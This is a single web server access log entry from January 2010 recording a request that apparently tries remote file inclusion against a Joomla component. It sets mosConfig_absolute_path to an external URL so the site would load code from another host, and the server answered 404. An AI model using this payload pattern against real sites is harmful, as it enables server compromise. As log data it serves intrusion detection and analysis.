72.22.197.240 - - [05/Jan/2010:02:57:04 -0500] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
